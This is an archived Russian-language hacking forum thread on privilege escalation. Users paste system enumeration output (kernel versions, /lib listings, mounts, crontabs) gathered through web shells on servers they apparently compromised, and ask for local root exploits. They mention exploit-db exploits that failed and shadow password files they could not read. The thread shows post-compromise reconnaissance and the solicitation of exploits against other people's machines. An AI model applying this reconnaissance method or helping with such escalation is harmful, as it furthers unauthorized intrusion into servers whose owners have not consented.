Повышение прав [задай вопрос - получи ответ] [Архив] - Страница 3

Inoms

05.07.2013, 21:06

Code:
$ uname -a
Linux ubuntu 2.6.38-8-generic-pae #42-Ubuntu SMP Mon Apr 11 05:17:09 UTC 2011 i686 i686 i386 GNU/Linux
$ ls -la /boot
total 20356
drwxr-xr-x 3 root root 4096 Aug 31 2011 .
drwxr-xr-x 22 root root 4096 Jun 14 2012 ..
-rw------- 1 root root 2152865 Apr 11 2011 System.map-2.6.38-8-generic-pae
-rw-r--r-- 1 root root 739574 Apr 11 2011 abi-2.6.38-8-generic-pae
-rw-r--r-- 1 root root 137275 Apr 11 2011 config-2.6.38-8-generic-pae
drwxr-xr-x 3 root root 12288 Aug 31 2011 grub
-rw-r--r-- 1 root root 12801054 Aug 31 2011 initrd.img-2.6.38-8-generic-pae
-rw-r--r-- 1 root root 160988 Oct 22 2010 memtest86+.bin
-rw-r--r-- 1 root root 163168 Oct 22 2010 memtest86+_multiboot.bin
-rw------- 1 root root 1220 Apr 11 2011 vmcoreinfo-2.6.38-8-generic-pae
-rw------- 1 root root 4652272 Apr 11 2011 vmlinuz-2.6.38-8-generic-pae
$ ls -la --full-time /lib/lib*
lrwxrwxrwx 1 root root 15 2011-08-31 02:48:17.724232228 +0400 /lib/libatm.so.1 -> libatm.so.1.0.0
-rw-r--r-- 1 root root 34452 2010-12-13 14:52:16.000000000 +0300 /lib/libatm.so.1.0.0
lrwxrwxrwx 1 root root 15 2011-08-31 02:52:58.332232322 +0400 /lib/libbsd.so.0 -> libbsd.so.0.2.0
-rw-r--r-- 1 root root 38676 2010-01-22 14:53:51.000000000 +0300 /lib/libbsd.so.0.2.0
lrwxrwxrwx 1 root root 15 2012-07-05 16:31:06.461813619 +0400 /lib/libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2012-07-05 16:31:06.461813619 +0400 /lib/libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 70036 2011-12-13 19:25:09.000000000 +0300 /lib/libbz2.so.1.0.4
lrwxrwxrwx 1 root root 14 2011-08-31 02:48:20.084232230 +0400 /lib/libcap.so.2 -> libcap.so.2.20
-rw-r--r-- 1 root root 13816 2011-02-15 22:35:29.000000000 +0300 /lib/libcap.so.2.20
-rw-r--r-- 1 root root 1341364 2011-02-23 03:45:27.000000000 +0300 /lib/libcrypto.so.0.9.8
-rw-r--r-- 1 root root 137308 2011-01-24 22:57:13.000000000 +0300 /lib/libdevmapper.so.1.02.1
lrwxrwxrwx 1 root root 16 2011-08-31 02:52:21.740232309 +0400 /lib/libfuse.so.2 -> libfuse.so.2.8.4
-rw-r--r-- 1 root root 158272 2011-02-11 00:03:17.000000000 +0300 /lib/libfuse.so.2.8.4
lrwxrwxrwx 1 root root 17 2011-09-21 21:58:00.217714895 +0400 /lib/libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 30096 2010-01-14 19:47:16.000000000 +0300 /lib/libhistory.so.5.2
lrwxrwxrwx 1 root root 17 2011-08-31 02:48:22.452232230 +0400 /lib/libhistory.so.6 -> libhistory.so.6.2
-rw-r--r-- 1 root root 30060 2011-02-24 04:53:51.000000000 +0300 /lib/libhistory.so.6.2
lrwxrwxrwx 1 root root 17 2011-08-31 02:52:54.028232331 +0400 /lib/libip4tc.so.0 -> libip4tc.so.0.0.0
-rw-r--r-- 1 root root 21852 2010-11-16 19:35:05.000000000 +0300 /lib/libip4tc.so.0.0.0
lrwxrwxrwx 1 root root 17 2011-08-31 02:52:54.032232329 +0400 /lib/libip6tc.so.0 -> libip6tc.so.0.0.0
-rw-r--r-- 1 root root 21864 2010-11-16 19:35:05.000000000 +0300 /lib/libip6tc.so.0.0.0
lrwxrwxrwx 1 root root 15 2011-08-31 02:52:54.028232331 +0400 /lib/libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 9684 2010-11-16 19:35:05.000000000 +0300 /lib/libipq.so.0.0.0
lrwxrwxrwx 1 root root 19 2011-08-31 02:52:54.032232329 +0400 /lib/libipq_pic.so.0 -> libipq_pic.so.0.0.0
-rw-r--r-- 1 root root 9688 2010-11-16 19:35:05.000000000 +0300 /lib/libipq_pic.so.0.0.0
lrwxrwxrwx 1 root root 16 2011-08-31 02:52:54.028232331 +0400 /lib/libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5212 2010-11-16 19:35:05.000000000 +0300 /lib/libiptc.so.0.0.0
-rw-r--r-- 1 root root 30120 2010-12-17 21:41:36.000000000 +0300 /lib/libiw.so.30
lrwxrwxrwx 1 root root 17 2011-08-31 02:46:55.816232201 +0400 /lib/libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root 223468 2011-01-07 17:58:51.000000000 +0300 /lib/libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2011-08-31 02:46:56.496232200 +0400 /lib/libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root 272652 2011-01-07 17:58:56.000000000 +0300 /lib/libncursesw.so.5.7
lrwxrwxrwx 1 root root 20 2011-08-31 02:46:50.748232200 +0400 /lib/libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
-rw-r--r-- 1 root root 29984 2011-02-18 18:00:19.000000000 +0300 /lib/libnih-dbus.so.1.0.0
lrwxrwxrwx 1 root root 15 2011-08-31 02:46:51.388232198 +0400 /lib/libnih.so.1 -> libnih.so.1.0.0
-rw-r--r-- 1 root root 75040 2011-02-18 18:00:19.000000000 +0300 /lib/libnih.so.1.0.0
lrwxrwxrwx 1 root root 20 2011-08-31 02:52:22.896232310 +0400 /lib/libntfs-3g.so.79 -> libntfs-3g.so.79.0.0
-rw-r--r-- 1 root root 289416 2010-09-16 06:00:50.000000000 +0400 /lib/libntfs-3g.so.79.0.0
lrwxrwxrwx 1 root root 18 2011-08-31 02:53:03.328232323 +0400 /lib/libparted.so.0 -> libparted.so.0.0.1
-rw-r--r-- 1 root root 425316 2011-04-17 17:08:53.000000000 +0400 /lib/libparted.so.0.0.1
lrwxrwxrwx 1 root root 20 2011-08-31 02:53:44.984232343 +0400 /lib/libpcsclite.so.1 -> libpcsclite.so.1.0.0
-rw-r--r-- 1 root root 34244 2011-03-22 22:33:14.000000000 +0300 /lib/libpcsclite.so.1.0.0
lrwxrwxrwx 1 root root 27 2011-08-31 02:47:01.132232202 +0400 /lib/libply-boot-client.so.2 -> libply-boot-client.so.2.0.0
-rw-r--r-- 1 root root 17772 2011-04-17 17:02:50.000000000 +0400 /lib/libply-boot-client.so.2.0.0
lrwxrwxrwx 1 root root 27 2011-08-31 02:47:01.132232202 +0400 /lib/libply-splash-core.so.2 -> libply-splash-core.so.2.0.0
-rw-r--r-- 1 root root 59092 2011-04-17 17:02:50.000000000 +0400 /lib/libply-splash-core.so.2.0.0
lrwxrwxrwx 1 root root 31 2011-08-31 02:47:01.132232202 +0400 /lib/libply-splash-graphics.so.2 -> libply-splash-graphics.so.2.0.0
-rw-r--r-- 1 root root 26152 2011-04-17 17:02:50.000000000 +0400 /lib/libply-splash-graphics.so.2.0.0
lrwxrwxrwx 1 root root 15 2011-08-31 02:47:01.132232202 +0400 /lib/libply.so.2 -> libply.so.2.0.0
-rw-r--r-- 1 root root 75568 2011-04-17 17:02:50.000000000 +0400 /lib/libply.so.2.0.0
lrwxrwxrwx 1 root root 16 2011-08-31 02:48:21.864232229 +0400 /lib/libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 42852 2010-05-14 20:33:32.000000000 +0400 /lib/libpopt.so.0.0.0
-rw-r--r-- 1 root root 59108 2011-04-07 19:36:13.000000000 +0400 /lib/libproc-3.2.8.so
lrwxrwxrwx 1 root root 18 2011-09-21 21:58:00.217714895 +0400 /lib/libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 196652 2010-01-14 19:47:16.000000000 +0300 /lib/libreadline.so.5.2
lrwxrwxrwx 1 root root 18 2011-08-31 02:48:22.452232230 +0400 /lib/libreadline.so.6 -> libreadline.so.6.2
-rw-r--r-- 1 root root 204856 2011-02-24 04:53:51.000000000 +0300 /lib/libreadline.so.6.2
-rw-r--r-- 1 root root 214944 2010-05-27 13:15:42.000000000 +0400 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 17 2011-08-31 02:47:02.424232204 +0400 /lib/libslang.so.2 -> libslang.so.2.2.2
-rw-r--r-- 1 root root 792384 2010-12-13 15:04:53.000000000 +0300 /lib/libslang.so.2.2.2
-rw-r--r-- 1 root root 294696 2011-02-23 03:45:27.000000000 +0300 /lib/libssl.so.0.9.8
lrwxrwxrwx 1 root root 17 2012-08-12 16:54:21.127559470 +0400 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 42328 2010-08-06 21:39:21.000000000 +0400 /lib/libsysfs.so.2.0.1
lrwxrwxrwx 1 root root 20 2011-08-31 02:52:21.740232309 +0400 /lib/libulockmgr.so.1 -> libulockmgr.so.1.0.1
-rw-r--r-- 1 root root 9564 2011-02-11 00:03:17.000000000 +0300 /lib/libulockmgr.so.1.0.1
lrwxrwxrwx 1 root root 19 2011-08-31 02:46:55.224232200 +0400 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 25924 2011-02-23 22:35:06.000000000 +0300 /lib/libusb-0.1.so.4.4.4
lrwxrwxrwx 1 root root 16 2011-08-31 03:11:30.214659292 +0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 30980 2011-01-10 21:29:10.000000000 +0300 /lib/libwrap.so.0.7.6
-rw-r--r-- 1 root root 9500 2009-11-05 16:27:27.000000000 +0300 /lib/libx86.so.1
lrwxrwxrwx 1 root root 19 2011-08-31 02:52:54.028232331 +0400 /lib/libxtables.so.5 -> libxtables.so.5.0.0
-rw-r--r-- 1 root root 26104 2010-11-16 19:35:05.000000000 +0300 /lib/libxtables.so.5.0.0
$ mount
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
none on /sys type sysfs (rw,noexec,nosuid,nodev)
fusectl on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /dev type devtmpfs (rw,mode=0755)
none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /dev/shm type tmpfs (rw,nosuid,nodev)
none on /var/run type tmpfs (rw,nosuid,mode=0755)
none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 906G 651G 209G 76% /
none 6.0G 196K 6.0G 1% /dev
none 6.0G 8.0K 6.0G 1% /dev/shm
none 6.0G 60K 6.0G 1% /var/run
none 6.0G 0 6.0G 0% /var/lock
$ cat /etc/issue
Ubuntu 11.04 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version
Linux version 2.6.38-8-generic-pae (buildd@vernadsky) (gcc version 4.5.2 (Ubuntu/Linaro 4.5.2-8ubuntu3) ) #42-Ubuntu SMP Mon Apr 11 05:17:09 UTC 2011
$ cat /proc/sys/vm/mmap_min_addr
65536
$ pwd
/var/www
$ ls -la /usr/bin/staprun
ls: cannot access /usr/bin/staprun: No such file or directory
$

Возможно пробить чем-нибудь ?

Пробовал это: http://www.exploit-db.com/exploits/26131/ - Ошибка при компиляции;

Это: http://www.exploit-db.com/exploits/18197/ - Segmentation fault

Заранее благодарен

PurePass777

11.07.2013, 04:51

Хелпаните мелкими советами)

Залился шелл из папки выйти не даёт, перекидывает на 404, даже не знаю где смотреть /e/pass вместо пасса X стоит шэйдов скрыт, вообщем всё как надо) все которые конфиги находил кроме хттпд прав не хватает, нашёл сплоит вроде как для этой версии, но из шелла думаю выполнится ли... ( За ранее спасибо...

Code:
$ uname -a
Linux XXXXXXXXXXXXXXXXXXXXXXXXXXX.com 2.6.18-308.4.1.el5 #1 SMP Wed Mar 28 01:54:56 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot
total 34318
drwxr-xr-x 4 root root 3072 Mar 26 23:36 .
drwxr-xr-x 34 root root 4096 Jul 9 21:59 ..
-rw-r--r-- 1 root root 66892 Sep 20 2010 config-2.6.18-194.17.1.el5
-rw-r--r-- 1 root root 67545 Mar 28 2012 config-2.6.18-308.4.1.el5
drwxr-xr-x 2 root root 1024 Mar 26 23:36 grub
-rw------- 1 root root 3659147 Mar 25 04:37 initrd-2.6.18-194.17.1.el5.img
-rw------- 1 root root 3629665 Mar 25 04:36 initrd-2.6.18-194.17.1.el5.img.dup_orig
-rw------- 1 root root 4844961 May 19 2012 initrd-2.6.18-194.17.1.el5kdump.img
-rw------- 1 root root 3580393 Feb 27 08:52 initrd-2.6.18-308.4.1.el5.cbmr1361973144
-rw------- 1 root root 3670869 Mar 25 04:38 initrd-2.6.18-308.4.1.el5.img
-rw------- 1 root root 3640959 Mar 25 04:36 initrd-2.6.18-308.4.1.el5.img.dup_orig
-rw------- 1 root root 4956700 Mar 25 05:00 initrd-2.6.18-308.4.1.el5kdump.img
drwx------ 2 root root 12288 Oct 19 2010 lost+found
-rw-r--r-- 1 root root 112729 Sep 20 2010 symvers-2.6.18-194.17.1.el5.gz
-rw-r--r-- 1 root root 116678 Mar 28 2012 symvers-2.6.18-308.4.1.el5.gz
-rw-r--r-- 1 root root 1243411 Sep 20 2010 System.map-2.6.18-194.17.1.el5
-rw-r--r-- 1 root root 1276609 Mar 28 2012 System.map-2.6.18-308.4.1.el5
-rw-r--r-- 1 root root 1955036 Sep 20 2010 vmlinuz-2.6.18-194.17.1.el5
-rw-r--r-- 1 root root 163 Sep 20 2010 .vmlinuz-2.6.18-194.17.1.el5.hmac
-rw-r--r-- 1 root root 2117052 Mar 28 2012 vmlinuz-2.6.18-308.4.1.el5
-rw-r--r-- 1 root root 162 Mar 28 2012 .vmlinuz-2.6.18-308.4.1.el5.hmac

$ ls -la --full-time /lib/lib*
lrwxrwxrwx 1 root root 15 2013-02-27 06:33:17.000000000 -0500 /lib/libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 24180 2011-10-24 08:36:54.000000000 -0400 /lib/libacl.so.1.1.0
-rwxr-xr-x 1 root root 14128 2012-10-01 12:02:03.000000000 -0400 /lib/libanl-2.5.so
lrwxrwxrwx 1 root root 13 2013-03-21 04:20:57.000000000 -0400 /lib/libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 18 2013-02-27 06:28:36.000000000 -0500 /lib/libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 908940 2008-08-27 13:47:23.000000000 -0400 /lib/libasound.so.2.0.0
lrwxrwxrwx 1 root root 16 2013-02-27 06:23:20.000000000 -0500 /lib/libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 14488 2006-07-12 02:52:37.000000000 -0400 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2013-02-27 06:33:17.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 95740 2011-10-28 09:12:02.000000000 -0400 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2013-02-27 06:33:17.000000000 -0500 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 58932 2011-10-28 09:12:02.000000000 -0400 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root 15 2013-03-21 04:20:59.000000000 -0400 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 36708 2012-07-13 11:18:17.000000000 -0400 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 7664 2012-10-01 12:02:02.000000000 -0400 /lib/libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2013-03-21 04:20:57.000000000 -0400 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 1706232 2012-10-01 12:02:03.000000000 -0400 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 14 2013-02-27 06:28:36.000000000 -0500 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2006-11-14 04:36:44.000000000 -0500 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2012-10-01 12:02:03.000000000 -0400 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2013-03-21 04:20:57.000000000 -0400 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2013-03-21 04:20:59.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7812 2012-07-13 11:18:17.000000000 -0400 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2012-10-01 12:02:03.000000000 -0400 /lib/libcrypt-2.5.so
-rwxr-xr-x 1 root root 1298276 2013-02-25 09:39:03.000000000 -0500 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 2013-03-21 04:21:00.000000000 -0400 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 15 2013-03-21 04:20:57.000000000 -0400 /lib/libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx 1 root root 11 2013-03-21 04:20:57.000000000 -0400 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root 1010140 2010-05-26 08:20:06.000000000 -0400 /lib/libdb-4.3.so
lrwxrwxrwx 1 root root 18 2013-02-27 06:33:17.000000000 -0500 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 253392 2011-07-28 11:54:22.000000000 -0400 /lib/libdbus-1.so.3.4.0
-r--r--r-- 1 root root 495300 2011-10-17 09:32:24.000000000 -0400 /lib/libdevmapper.a
-r--r--r-- 1 root root 45014 2011-10-17 09:32:29.000000000 -0400 /lib/libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2013-02-27 06:33:17.000000000 -0500 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 18488 2011-10-17 09:32:33.000000000 -0400 /lib/libdevmapper-event.so.1.02
lrwxrwxrwx 1 root root 20 2013-02-27 06:33:17.000000000 -0500 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 163324 2011-10-17 09:32:34.000000000 -0400 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root 20668 2012-10-01 12:02:03.000000000 -0400 /lib/libdl-2.5.so
lrwxrwxrwx 1 root root 12 2013-03-21 04:20:57.000000000 -0400 /lib/libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 13 2013-03-21 04:20:59.000000000 -0400 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 20192 2012-07-13 11:18:17.000000000 -0400 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2013-03-21 04:21:01.000000000 -0400 /lib/libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x 1 root root 135932 2012-04-27 11:35:33.000000000 -0400 /lib/libexpat.so.0.5.0
lrwxrwxrwx 1 root root 16 2013-03-21 04:20:59.000000000 -0400 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 113892 2012-07-13 11:18:17.000000000 -0400 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root 46676 2012-05-31 05:53:45.000000000 -0400 /lib/libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2013-03-21 04:20:59.000000000 -0400 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 23 2013-02-27 06:23:20.000000000 -0500 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 644952 2009-03-09 14:33:31.000000000 -0400 /lib/libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2013-02-27 06:23:20.000000000 -0500 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 11396 2009-03-09 14:33:31.000000000 -0400 /lib/libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2013-02-27 06:23:20.000000000 -0500 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 259128 2009-03-09 14:33:31.000000000 -0400 /lib/libgobject-2.0.so.0.1200.3

Code:
lrwxrwxrwx 1 root root 26 2013-02-27 06:23:20.000000000 -0500 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 16212 2009-03-09 14:33:31.000000000 -0400 /lib/libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 27964 2007-01-18 14:32:57.000000000 -0500 /lib/libiw.so.28
-rwxr-xr-x 1 root root 8072 2006-08-22 13:24:04.000000000 -0400 /lib/libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2013-02-27 06:28:36.000000000 -0500 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
-rwxr-xr-x 1 root root 216544 2012-10-01 12:02:04.000000000 -0400 /lib/libm-2.5.so
lrwxrwxrwx 1 root root 11 2013-03-21 04:20:57.000000000 -0400 /lib/libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 109740 2012-10-01 12:02:04.000000000 -0400 /lib/libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2013-03-21 04:20:57.000000000 -0400 /lib/libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 36468 2012-10-01 12:02:06.000000000 -0400 /lib/libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 825028 2010-04-08 13:46:31.000000000 -0400 /lib/libnss_db-2.2.so
lrwxrwxrwx 1 root root 16 2013-02-27 06:23:20.000000000 -0500 /lib/libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root 21948 2012-10-01 12:02:07.000000000 -0400 /lib/libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 50848 2012-10-01 12:02:07.000000000 -0400 /lib/libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 22764 2012-10-01 12:02:07.000000000 -0400 /lib/libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 3208608 2013-01-30 09:35:31.000000000 -0500 /lib/libnss_ldap-2.5.so
lrwxrwxrwx 1 root root 18 2013-03-21 04:21:06.000000000 -0400 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
-rwxr-xr-x 1 root root 46624 2012-10-01 12:02:07.000000000 -0400 /lib/libnss_nis-2.5.so
-rwxr-xr-x 1 root root 55804 2012-10-01 12:02:07.000000000 -0400 /lib/libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 21 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 17 2013-03-21 04:20:57.000000000 -0400 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2013-03-21 04:21:05.000000000 -0400 /lib/libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root 9868 2012-07-18 05:44:29.000000000 -0400 /lib/libpamc.so.0.81.0
lrwxrwxrwx 1 root root 21 2013-03-21 04:21:05.000000000 -0400 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 8624 2012-07-18 05:44:29.000000000 -0400 /lib/libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 16 2013-03-21 04:21:05.000000000 -0400 /lib/libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root 43020 2012-07-18 05:44:29.000000000 -0400 /lib/libpam.so.0.81.5
-rwxr-xr-x 1 root root 137944 2012-10-01 12:02:07.000000000 -0400 /lib/libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2013-03-21 04:20:57.000000000 -0400 /lib/libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 84904 2012-10-01 12:02:08.000000000 -0400 /lib/libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2013-03-21 04:20:57.000000000 -0400 /lib/libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 48156 2012-10-01 12:02:08.000000000 -0400 /lib/librt-2.5.so
lrwxrwxrwx 1 root root 12 2013-03-21 04:20:57.000000000 -0400 /lib/librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 16704 2012-10-01 12:02:03.000000000 -0400 /lib/libSegFault.so
-rwxr-xr-x 1 root root 93508 2010-11-16 06:35:21.000000000 -0500 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 245376 2009-10-27 10:34:52.000000000 -0400 /lib/libsepol.so.1
-rwxr-xr-x 1 root root 300412 2013-02-25 09:39:03.000000000 -0500 /lib/libssl.so.0.9.8e
lrwxrwxrwx 1 root root 16 2013-03-21 04:21:00.000000000 -0400 /lib/libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 12 2013-03-21 04:20:59.000000000 -0400 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 19008 2012-07-13 11:18:17.000000000 -0400 /lib/libss.so.2.0
lrwxrwxrwx 1 root root 19 2013-02-27 06:23:20.000000000 -0500 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 11828 2006-07-13 03:11:11.000000000 -0400 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 33852 2012-10-01 12:02:08.000000000 -0400 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2013-03-21 04:20:57.000000000 -0400 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 13492 2012-10-01 12:02:08.000000000 -0400 /lib/libutil-2.5.so
lrwxrwxrwx 1 root root 14 2013-03-21 04:20:57.000000000 -0400 /lib/libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2013-03-21 04:20:59.000000000 -0400 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 14472 2012-07-13 11:18:17.000000000 -0400 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root 22 2013-03-21 04:21:06.000000000 -0400 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 37032 2012-08-01 10:50:26.000000000 -0400 /lib/libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 16 2013-02-27 06:23:20.000000000 -0500 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 31344 2009-04-10 03:17:10.000000000 -0400 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root 13 2013-03-21 04:20:59.000000000 -0400 /lib/libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75120 2012-06-08 08:58:37.000000000 -0400 /lib/libz.so.1.2.3

$ mount
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/mapper/VolGroup00-LogVol02 on /data type ext3 (rw)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
none on /proc/fs/vmblock/mountPoint type vmblock (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
XXX.XXX.XXX.XXX:/data/nfsdata on /data/nfsdata type nfs (rw,addr=XXX.XXX.XXX.XXX)

$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
53G 20G 31G 40% /
/dev/mapper/VolGroup00-LogVol02
84G 32G 48G 40% /data
/dev/sda1 54M 24M 27M 48% /boot
tmpfs 3.9G 0 3.9G 0% /dev/shm

$ cat /etc/issue
Red Hat Enterprise Linux Server release 5.9 (Tikanga)
Kernel \r on an \m

$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

$ cat /proc/version
